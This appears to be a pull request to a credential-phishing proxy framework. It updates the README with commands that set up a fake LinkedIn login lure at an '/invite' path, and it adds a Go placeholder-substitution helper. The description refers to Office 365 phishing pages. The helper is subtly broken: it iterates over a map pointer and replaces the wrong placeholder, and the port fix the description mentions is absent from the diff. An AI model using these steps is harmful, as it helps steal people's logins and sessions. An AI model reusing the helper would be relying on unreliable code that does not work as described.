### PR TITLE
Base improvements for flexibility

### DIFF
--- a/README.md
+++ b/README.md
@@ -163,7 +163,9 @@ phishlets enable linkedin
 
 Your phishing site is now live. Think of the URL, you want the victim to be redirected to on successful login and get the phishing URL like this (victim will be redirected to `https://www.google.com`):
 ```
-phishlets get-url linkedin https://www.google.com
+lures create linkedin
+lures edit path 0 /invite
+lures edit info 0 LinkedIn Demonstration
 ```
 
 Running phishlets will only respond to tokenized links, so any scanners who scan your main domain will be redirected to URL specified as `redirect_url` under `config`. If you want to hide your phishlet and make it not respond even to valid tokenized phishing URLs, use `phishlet hide/unhide <phishlet>` command.

--- a/core/shared.go
+++ b/core/shared.go
@@ -1,5 +1,7 @@
 package core
 
+import "strings"
+
 func combineHost(sub string, domain string) string {
 	if sub == "" {
 		return domain
@@ -40,6 +42,17 @@ func truncateString(s string, maxLen int) string {
 		pre := s[:ml/2-1]
 		suf := s[len(s)-(ml/2-2):]
 		return pre + "..." + suf
+	}
+	return s
+}
+
+func patchPlaceholder(s string, params *map[string]string) string {
+	if params == nil {
+		return s
+	}
+	
+	for key, value := range params {
+		s = strings.Replace(s, "{"+value+"}", value, -1)
 	}
 	return s
 }


### PR DESCRIPTION
Lessons learned from O365 phishlets:
- Hostname with a port breaks the intercept. A simple equals for the likely port 443 should be sufficient for now.
- Sometimes we need dynamic URLs. The easiest way to do that to use the lure params and patch them in all fields we ever need to be dynamic.
- README is outdated with 2.3.0, as lures now are needed

As this is quickly coded, please test this on your side and verify that it works as intended.